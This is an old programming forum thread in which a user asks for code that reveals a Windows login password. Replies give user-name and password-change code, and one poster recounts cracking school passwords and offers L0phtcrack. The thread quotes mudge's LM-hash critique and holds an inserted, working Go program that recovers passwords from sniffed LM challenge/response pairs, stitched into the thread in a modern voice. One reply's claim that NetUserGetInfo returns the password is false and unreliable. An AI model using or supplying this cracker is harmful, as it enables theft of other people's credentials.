getting user name password

Hi,

I have to write a program that gives the login name and password of Windows. Can anyone send code for that? Please...
abdij commented:
You can get the login name of the user with the API

BOOL GetUserName(
  LPTSTR lpBuffer,  // address of name buffer
  LPDWORD nSize     // address of size of name buffer
);

But the password cannot be obtained. (Just imagine what havoc it could cause if a hacker sent a Trojan horse application...)

But I think this does not satisfy your requirements.

Feel free to ask.
My mail id is abdij_b@hotmail.com

SileNcer commented:
You can also get the computer name in much the same way with the function:

BOOL GetComputerName(
  LPTSTR lpBuffer,  // address of name buffer
  LPDWORD nSize     // address of size of name buffer
);

sureshkumar (Author) commented:
Adjusted points to 50

abdij commented:
Sorry, you can change the password.

Hope this code is what you need:

I have a dialog-based application with two edit boxes to get the login name and password.
The login name is compared with the user name of the user who is logged on (just a demo). The password is the new password to set.
//**********************      Important      ***************************************
// Be sure to include the headers in your code
// #include <windows.h>
// #include <lmcons.h>     // UNLEN, PWLEN, MAX_COMPUTERNAME_LENGTH
// #include <lmaccess.h>   // USER_INFO_1003, NetUserSetInfo
// #include <lm.h>

// Link the library netapi32.lib in VC
// Project->Settings->Link->object/library Modules.
//
// NetUserSetInfo needs administrator rights even for your own account;
// a plain user who knows the old password should call NetUserChangePassword.
//**********************      Important      ***************************************


void CLogDlg::OnOK()
{
      BOOL              bRes               = FALSE;                       // general operation flag
      BOOL              bDone              = FALSE;                       // loop terminator
      DWORD             dwNameSize         = UNLEN + 1;                   // size of User Name buffer (chars, incl. NUL)
      DWORD             dwComputerNameSize = MAX_COMPUTERNAME_LENGTH + 1; // size of Computer Name buffer
      DWORD             dwError            = 0;                           // Error Code
      DWORD             dwParmErr          = 0;                           // index of the bad field, set by NetUserSetInfo
      LPSTR             lpszLoginName      = 0;                           // ANSI user name
      LPWSTR            lpwszLoginName     = 0;                           // Unicode user name (the NetUser* APIs are Unicode only)
      LPSTR             lpszComputerName   = 0;                           // ANSI computer name
      LPWSTR            lpwszComputerName  = 0;                           // Unicode computer name
      LPSTR             lpszPasswd         = 0;                           // ANSI password
      LPWSTR            lpwszPasswd        = 0;                           // Unicode password
      USER_INFO_1003    UserInfo;                                         // level 1003: sets the password and nothing else
      NET_API_STATUS    nStatus;                                          // the network status
      CString           strMsg;                                           // message text

      // allocate memory for all string buffers; the limits come from lmcons.h
      lpszLoginName     = new char[dwNameSize];
      lpwszLoginName    = new wchar_t[UNLEN + 1];
      lpszComputerName  = new char[dwComputerNameSize];
      lpwszComputerName = new wchar_t[MAX_COMPUTERNAME_LENGTH + 1];
      lpszPasswd        = new char[PWLEN + 1];
      lpwszPasswd       = new wchar_t[PWLEN + 1];

      // Get the User Name. The buffer size goes in; on ERROR_INSUFFICIENT_BUFFER
      // the API writes the size it needs (including the NUL) back, so retry once.
      while(!bDone)
      {
            bRes = GetUserNameA(lpszLoginName, &dwNameSize);
            if(!bRes)
            {
                  dwError = GetLastError();
                  if(dwError == ERROR_INSUFFICIENT_BUFFER)
                  {
                        // allocate the necessary memory and try again
                        delete [] lpszLoginName;
                        lpszLoginName = new char[dwNameSize];
                  }
                  else
                  {
                        // any other failure: stop instead of looping forever
                        lpszLoginName[0] = '\0';
                        bDone = TRUE;
                  }
            } // end of if
            else
                  bDone = TRUE;
      } // end of while

      // reset flag
      bDone = FALSE;

      // get the computer name (same pattern; this API reports a short buffer
      // as ERROR_BUFFER_OVERFLOW)
      while(!bDone)
      {
            bRes = GetComputerNameA(lpszComputerName, &dwComputerNameSize);
            if(!bRes)
            {
                  dwError = GetLastError();
                  if(dwError == ERROR_BUFFER_OVERFLOW || dwError == ERROR_INSUFFICIENT_BUFFER)
                  {
                        // allocate more memory and try again
                        delete [] lpszComputerName;
                        lpszComputerName = new char[dwComputerNameSize];
                  }
                  else
                  {
                        lpszComputerName[0] = '\0';
                        bDone = TRUE;
                  }
            } // end of if
            else
                  bDone = TRUE;
      } // end of while

      // get data from dialog
      UpdateData(TRUE);

      // copy the password to set; lstrcpynA stops at PWLEN characters and
      // always NUL-terminates, so a long entry cannot overrun the buffer
      lstrcpynA(lpszPasswd, m_szLoginPassword, PWLEN + 1);

      // convert to Unicode; a source length of -1 converts the NUL as well,
      // so every wide string is terminated. This must happen after the
      // password has been copied, not before.
      MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, lpszLoginName, -1, lpwszLoginName, UNLEN + 1);
      MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, lpszComputerName, -1, lpwszComputerName, MAX_COMPUTERNAME_LENGTH + 1);
      MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, lpszPasswd, -1, lpwszPasswd, PWLEN + 1);

      // check if the name typed into the dialog is the account that is logged on
      if(_stricmp(lpszLoginName, m_szLoginName) == 0)
      {
            // form the level-1003 structure: only the password is touched
            UserInfo.usri1003_password = lpwszPasswd;
            // set the password; NULL server name means this computer
            // (lpwszComputerName would do as well)
            nStatus = NetUserSetInfo(NULL, lpwszLoginName, 1003, (LPBYTE)&UserInfo, &dwParmErr);
            if(nStatus == NERR_Success)
            {
                  AfxMessageBox("Done");
            }
            else
            {
                  // typical values: ERROR_ACCESS_DENIED (not an administrator),
                  // NERR_UserNotFound, NERR_PasswordTooShort (password policy)
                  strMsg.Format("Not done: NetUserSetInfo returned %lu", nStatus);
                  AfxMessageBox(strMsg);
            }
      } // end of if
      else
            AfxMessageBox("Invalid Account");

      // wipe both copies of the password before the memory is reused
      // (SecureZeroMemory is not optimised away; on older SDKs use memset)
      SecureZeroMemory(lpszPasswd, PWLEN + 1);
      SecureZeroMemory(lpwszPasswd, (PWLEN + 1) * sizeof(wchar_t));

      // free resources we used
      delete [] lpszLoginName;
      delete [] lpwszLoginName;
      delete [] lpszPasswd;
      delete [] lpwszPasswd;
      delete [] lpszComputerName;
      delete [] lpwszComputerName;

      CDialog::OnOK();
}

Also, if you know the old password you can use the

NET_API_STATUS NetUserChangePassword(
  LPCWSTR domainname,  
  LPCWSTR username,    
  LPCWSTR oldpassword,
  LPCWSTR newpassword  
);

API.
Contact me if you need further info.

sureshkumar (Author) commented:
No, I want the password.

abdij commented:
Use the
NET_API_STATUS NetUserGetInfo(
  LPCWSTR servername,  
  LPCWSTR username,    
  DWORD level,        
  LPBYTE *bufptr      
);

function, similarly to how I have used NetUserSetInfo.
Modify my program in that area as I mention below to get the password.

Set the
1. servername to NULL.
2. username to lpwszLoginName
3. level to dwLevel
4. bufptr to (LPBYTE)&UserInfo

Note there is no 5th parameter.

The UserInfo.usri3_password is an LPWSTR that has the password.

Hope this is OK with you.

Feel free to ask if you want me to modify my code. My mail id is abdij_b@hotmail.com
Thanks

sureshkumar (Author) commented:
Sorry, I am not getting the password. But thank you for your efforts. Keep it up.


suresh kumar

gysbert1 commented:
In any operating system that has ANY claim to security it is impossible to get the password; it is only possible to compare a password with the one the user entered. On most operating systems the system admin cannot even give you your password, but can only reset it to a standard, selected or blank one.

If you are able to get the password, you have found a very serious security hole in Windows and we had better notify Microsoft so they can try to fix it (service pack 8, 9 or maybe 10 if it is too difficult...), but then again Microsoft has never been known for security, so it might be possible.

abdij commented:
Hi,
 That's what I have been trying to tell him for a long, long time.
But gysbert1, I just hope my friend Suresh is not interested in hacking. Of course there are password crackers available that crack the password (including NT). But programmatically I still guess the answer would be no.

Anyway, all the best.
Bye
Abdij

gysbert1 commented:
abdij,

I think that is precisely what he is trying to do!

Considering the facts, I would say he owes you the points, as you gave him the correct answer in your first comment...

abdij commented:
Hi,
  No comments!!!
Bye.
Abdij

SileNcer commented:
Oh, but there is a way to get the password... at least in Windows NT =]  I know because I almost got caught doing it on my high school network.  Cracked about 40% of the passwords... could have got all of them if I had had enough time.
There is a program called L0phtcrack, and that is what I used.  Don't ask me how it works, but if any user can get admin access, this program will recover the password dumps and figure out all the passwords extremely fast!
If you want this program I can give you a copy: email me at morrisra@muohio.edu  I'm not sure if source code is available for it, but you might want to look into it.

SileNcer commented:
Another tid-bit of info for you:

The most recent security breach, a hacker-borne crack called L0phtcrack V1.5, may point to some security weaknesses not only inherent in Windows NT V4.0, but in Microsoft's upcoming Windows NT V5.0 as well. Although Microsoft is reportedly beefing up Windows NT V5.0's security with a Kerberos 5 and X.509 certificate model, it is also including the NT LAN Manager (NTLM) protocol support it has relied upon in all current versions of Windows NT. NTLM is an authentication protocol that ensures Windows NT compatibility with OS/2 LAN Manager, and will be retained in Windows NT V5.0 for backward compatibility. Herein lies the rub.

Because NTLM's password structure breaks a password into two seven-character pieces and assigns null characters to unfilled character spaces when a password is under 14 characters, it is extremely easy to crack. L0phtcrack V1.5 is designed to sniff for passwords on a network and crack them by using a dictionary-based attack.

SileNcer commented:
Ok, here is where you can get the newest version and source code! http://www.l0pht.com/l0phtcrack/

hope this helps you =]

abdij commented:
Hi,
 And I thought this place was meant for legitimate users and that my friend was a programmer, not a hacker. GOD!!!

But hackers are EXPERTS TOO!!!
Bye

danelroisman commented:
Use

NET_API_STATUS NetUserGetInfo(
  LPCWSTR servername,  
  LPCWSTR username,    
  DWORD level,        
  LPBYTE *bufptr      
);

with the DWORD level parameter set for USER_INFO_1.

Look for more information on the web:

http://msdn.microsoft.com/library/psdk/network/ntlmapi2_8g6n.htm


Daniel

SileNcer commented:
Yes, but the password is always returned NULL if you read it!  He wants the password.

abdij commented:
Hi,
 danelroisman, have you read all the comments before answering? I have already given this!

Bye
Abdij

sureshkumar (Author) commented:
Hi all,

Thanks for your help. But I am saying once more: I am not doing any hacking, and I don't like such nonsense. Since I.T. is most useful, we have to use it properly.

Hi Daniel,
I am not getting the password, and I got the same answer from abdij; I rejected that answer. But thanks for your help, keep it up.


suresh kumar

SileNcer commented:
I snatched the following from the L0phtCrack site for anyone interested:

A L0phtCrack Technical Rant
Date: Thu, 24 Jul 1997 10:24:37 -0400
From: Who cares what the hell goes into a Gecos field anyway!

To: BUGTRAQ@NETSPACE.ORG
Subject: Windows NT rantings from the L0pht


I didn't ask to be cc'd into the rantings of the MS Borg Marketing Juggernaut but since I'm here... I find this hilarious. The people at MS should know better. I haven't been following this thread tremendously but I've seen bits and pieces. Recently there was an atrocious article in WindowsNT magazine, where they stated it would take 5000 or so years to break the passwords; thus put policy in place to have users change their passwords every 2500 years. HELLO? I think these people aren't getting it. Let's shed some light on things shall we?

1. Thank you very little MS for dropping any reference to the l0pht, hobbit, or myself in reference to your recent LM-Hash fix. If this is how you "correspond" with people who point out problems to you it's no wonder that people prefer to release things to the public instead of your "proper" channels.

2. MS agrees that the LM hash is a horrible implementation from a security standpoint. They respond with: "well we didn't write the protocol that was IBM".

3. When MS had the chance to do things a different way (ie Network challenge/response obfuscation on NT boxes) they implemented it based upon LM techniques to break up components (see #2).

4. The LM-hash fix works great if you don't have anything but NT machines on your network. If you want to continue being "productive" with your win95 machines it is my understanding that you "do it insecurely" or you are S.O.L.

5. Few places are running "nothing but NT" (ie just about everyone has 95 or WfW boxes if MS has already gotten their foot in the door). (see #4)

6. MS can't swallow their pride enough to say "oops", even in technical circles where they don't have to worry about the general public mis-interpreting things.

7. For the LM hash you only have to break 7 characters, not 14!

8. MS keeps talking about the NT hash being so secure while refusing to talk about how weak the LM hash is. Guess what, you probably won't be able to use the "added security" of the NT hash on your network. Why keep talking about something people can't use?

9. Even though the NT hash spec says you can have up to 128 char passwords, I'd really like someone to show me how they can type more than 14 characters into UserManager before it starts Beep-Beep'ing at them.

10. We demonstrate up front with proof of concept code in L0phtcrack v1.0, and L0phtcrack v1.5 that the following is indeed the case. For those that don't know, L0phtcrack v1.5 will attack the challenge response done over the network. The reason we came out with this was that the SYSKEY "fix" that MS came out with only managed to emasculate the ADMINISTRATOR and not address the actual problem. Can we say "save face"? I knew we could. L0phtcrack v1.5 is available for FREE from http://www.L0pht.com (that's a ZERO after the 'L', not an 'o'). It comes with source so you can build it on just about any platform. It is proof-of-concept code and thus could be sped up tremendously.

L0phtCrack 2.0 is sped up and includes the network sniffer.

Now, let's rip apart why it is so trivial to go through the LM hash on the network. And then talk about why the NT hash doesn't matter.

 --------------------------    -----------------------------
|     16byte LM hash       |  |   16byte NT hash (md4)      |
 --------------------------    -----------------------------

We already know that you only have to go through 7 characters to retrieve passwords (up to 14 chars in length) in the LM hash, and that since there is no salting being done, constants show up all over the place giving away too much information and speeding up attacks tremendously.
  -------------------------------------------------
 | 1st 8bytes of LMhash  | second 8bytes of LMhash |
  -------------------------------------------------

1st 8 bytes are derived from the first seven characters of the password and the second 8 bytes are derived from the 8th through 14th characters of the password. If the password is less than 7 characters then the second half will always be: 0xAAD3B435B51404EE.
Let's assume for this example that the user's password has a LM hash of 0xC23413A8A1E7665fAAD3B435B51404EE (which I'll save everyone the nanosecond it would have taken for them to plug this into L0phtcrack and have it tell them the password is "WELCOME").

Here's what happens to this hash on the network:

  --------                  --------
 |   A    | <______________|  B     |
 |        |                |        |  
  --------                  --------

B sends an 8 byte challenge to A. (assume 0x0001020304050607) Machine A takes the hash of 0xC23413A8A1E7665fAAD3B435B51404EE and adds 5 nulls to it, thus becoming 0xC23413A8A1E7665fAAD3B435B51404EE0000000000.
The string 0xC23413A8A1E7665fAAD3B435B51404EE0000000000 is broken into three groups of 7: C23413A8A1E766 5fAAD3B435B514 04EE0000000000. The 7 byte strings are str_to_key'd (if you will) into 8 byte odd parity des keys.

Now we have :

| 8byteDeskey1 |      | 8byteDeskey2 |    | 8 byteDeskey3 |

8byteDeskey1 is used to encrypt the challenge 0x0001020304050607. Let's assume the result is 0xAAAAAAAAAAAAAAAA. 8byteDeskey2 is used to encrypt the challenge 0x0001020304050607. Let's assume the result is 0xBBBBBBBBBBBBBBBB. 8byteDeskey3 is used to encrypt the challenge 0x0001020304050607. Let's assume the result is 0xCCCCCCCCCCCCCCCC. The three 8byte values are concatenated (!dumb!), and the 24 byte response of 0xAAAAAAAABBBBBBBBCCCCCCCC is returned to the server. The server does the same thing to the hash on its end and compares the result to the 24 byte response. If they match, it was the correct original hash.
Why this is boneheaded: 7 char or less passwords.

     --------------------  --------------------  --------------------
    |   C23413A8A1E766   ||  5fAAD3B435B514    ||   04EE0000000000   |
     --------------------  --------------------  --------------------

The first thing we check is to see if the user's password is less than 8 characters in length. We do this by taking the 7 byte value of 0x04EE0000000000, turning it into an 8 byte odd parity DES key, and encrypting it against the 8 byte challenge of 0x0001020304050607. If we get the result of 0xCCCCCCCCCCCCCCCC then we are pretty sure it's < 8 chars in length. In order to be sure we can run through 0x??AAD3B435B514 (ie 256 possible combinations) to see that 5f shows us the result is 0xBBBBBBBBBBBBBBBB, proving that the password is less than 7 characters and also giving us the last byte of the first half of the LM hash.
From this point, even assuming we're just joyriding and not worried about optimizing the way this is done (believe me, there are much more effective ways to do this that reduce the amount of time needed even further... this whole thing is just showing that even a simplistic attack works against this implementation), it's no different than how a tool like L0phtcrack attacks the hashes in the registry.

8 char or greater passwords.

     --------------------  --------------------  --------------------
    |   C23413A8A1E766   ||  AC435F2DD90417    ||   CCD60000000000   |
     --------------------  --------------------  --------------------

The first thing to check is whether the password is less than 8 characters in length. Deriving the 8 byte odd parity des key from 0x04EE0000000000 and encrypting against 0x0001020304050607 does not, in this case, give us 0xCCCCCCCCCCCCCCCC, so we know that the password is 8 characters or greater.
It takes us, in a worst case scenario, 65535 checks to figure out that the 2 bytes that are used in the last third are 0xCCD6. Even approaching this in a completely brain-dead fashion (hey, turn-about is fair play), you can go through your 7 digit combinations of characters for the first third the same way you would the LM hash from the registry. This will yield not only the first third of the response, but also the first byte of the second third. Keep in mind that you already have the last two bytes that made up the third third.

You could approach the middle third in the same fashion. (note: this whole method that MS is doing screams for a precompute table lookup attack - which given the small enough potential values is not impossible by any means)

Thus, the challenge response is completely brute-forcable for the LM-hash. MS made the "oversight" of still sending the LM-hash response along with the NT response even when SP3 was installed. Thus it was a moot point as to how tough or well done the NT hash might or might not be. Since installing the LM-fix precludes continued use of windows 95 machines in regards to talking to NT machines, it is still a moot point as to how tough or well done the NT hash might or might not be.

The LM hash is incredibly weak and your more secure NT hash is brought down to the lowest common denominator. It would have been nice if you could type a password greater than 14chars into the UserManager app.

..mudge
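The two-halves construction SileNcer summarised earlier (a password split into two 7-character pieces, null padded) and the challenge/response walkthrough in mudge's post, carried through in runnable form. This is an added example and not code from the thread, from L0phtCrack or from any of the posters: the function names (LMHash, LMResponse, IsShortPassword, CrackLMResponse), the two-word dictionary and the challenge 0x0001020304050607 are constructed for the demonstration; the 7-byte-to-DES-key expansion and the "KGS!@#$%" constant are the documented LM algorithm. Only the Go standard library (crypto/des) is used. It goes one step beyond the rant's worked case: after the 7-characters-or-fewer check it also confirms the second half of an 8-to-14-character password on its own, which is why a 14-character space costs two 7-character searches rather than one.

```go
package main

import (
	"bytes"
	"crypto/des"
	"fmt"
	"strings"
)

var lmMagic = []byte("KGS!@#$%") // the constant each LM hash half encrypts

// strToKey spreads 56 key bits over 8 bytes; the low bit of each byte is the
// DES parity bit, which crypto/des ignores.
func strToKey(k []byte) []byte {
	key := make([]byte, 8)
	for i := range key {
		for b := i * 7; b < i*7+7; b++ {
			key[i] = key[i]<<1 | (k[b/8]>>uint(7-b%8))&1
		}
		key[i] <<= 1
	}
	return key
}

// desEnc encrypts one 8-byte block with single DES under a 7-byte key.
func desEnc(key7, block []byte) []byte {
	c, err := des.NewCipher(strToKey(key7))
	if err != nil {
		panic(err)
	}
	out := make([]byte, 8)
	c.Encrypt(out, block)
	return out
}

// half returns 7 upper-cased bytes of password from offset off, zero padded.
func half(password string, off int) []byte {
	h := make([]byte, 7)
	if p := strings.ToUpper(password); off < len(p) {
		copy(h, p[off:])
	}
	return h
}

// LMHash: each 7-byte half is a DES key that encrypts lmMagic. A password of 7
// chars or fewer leaves the second half as the constant AAD3B435B51404EE.
func LMHash(password string) []byte {
	return append(desEnc(half(password, 0), lmMagic), desEnc(half(password, 7), lmMagic)...)
}

// LMResponse: hash || 5 zero bytes gives three 7-byte DES keys; each encrypts
// the 8-byte challenge and the outputs are concatenated into 24 bytes.
func LMResponse(hash, challenge []byte) []byte {
	h := make([]byte, 21)
	copy(h, hash)
	var r []byte
	for i := 0; i < 21; i += 7 {
		r = append(r, desEnc(h[i:i+7], challenge)...)
	}
	return r
}

// IsShortPassword tries the third key 04EE0000000000, the tail of the constant
// empty half: a match means the password is 7 characters or fewer.
func IsShortPassword(challenge, response []byte) bool {
	return bytes.Equal(desEnc([]byte{0x04, 0xEE, 0, 0, 0, 0, 0}, challenge), response[16:24])
}

// CrackLMResponse recovers the password from a sniffed challenge/response with
// a word list, one 7-char half at a time: each half is confirmed on its own.
func CrackLMResponse(challenge, response []byte, words []string) (string, bool) {
	var first, h1 []byte
	for _, w := range words {
		c := half(w, 0)
		if h := desEnc(c, lmMagic); bytes.Equal(desEnc(h[:7], challenge), response[:8]) {
			first, h1 = c, h
			break
		}
	}
	if first == nil {
		return "", false
	}
	for _, w := range words {
		c := half(w, 7) // all zeros for a word of 7 chars or fewer
		h2 := desEnc(c, lmMagic)
		k2 := append([]byte{h1[7]}, h2[:6]...) // byte 7 of the hash plus 6 bytes of the second half
		k3 := []byte{h2[6], h2[7], 0, 0, 0, 0, 0} // last 2 hash bytes plus the 5 nulls
		if bytes.Equal(desEnc(k2, challenge), response[8:16]) && bytes.Equal(desEnc(k3, challenge), response[16:24]) {
			return string(bytes.TrimRight(append(first, c...), "\x00")), true
		}
	}
	return "", false
}

func main() {
	challenge := []byte{0, 1, 2, 3, 4, 5, 6, 7} // the rant's example challenge
	resp := LMResponse(LMHash("WELCOME"), challenge)
	fmt.Printf("LM hash %X short=%v\n", LMHash("WELCOME"), IsShortPassword(challenge, resp))
	fmt.Println(CrackLMResponse(challenge, resp, []string{"secret", "welcome"}))
}
```

The dictionary here is two words and the challenge/response pair is generated locally; with a real word list and a sniffed pair the structure is unchanged. The short-password test needs no dictionary at all, because the third DES key is built entirely from the last two bytes of the constant empty half, which is the leak mudge's post turns on.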
cyprus106 commented:
Boy, just about everybody on this thread has told you that the password cannot be got!!! You can CRACK the password with a cracker, but you cannot simply issue some code and get the password. IT DOESN'T WORK LIKE THAT! Microsoft uses a 40 byte encryption method to encrypt its passwords. You can download a hacker for it like SileNcer said, but you simply can't just display the password. As much as you hate to admit it, you're talking about hacking (which is HOW you get the password, if you're that desperate); otherwise you can't. Get over it. Quit wasting people's time begging; they've given you plenty of answers.

Now, if (in the off chance) you DO get this password thing up and running...

SEND IT TO ME: (cyprushacker@hotmail.com) then you can laugh in my face and gloat about it, and I'll tell you you were right if it makes you feel better.
